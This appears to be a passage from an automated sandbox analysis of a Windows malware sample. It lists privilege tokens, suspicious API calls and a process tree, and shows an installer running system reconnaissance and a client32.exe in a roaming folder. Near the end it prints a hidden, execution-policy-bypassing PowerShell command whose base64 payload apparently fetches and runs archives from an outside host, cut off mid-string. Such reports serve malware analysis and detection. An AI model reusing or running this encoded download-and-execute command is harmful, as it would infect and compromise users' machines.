| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQUlBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkFHRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlB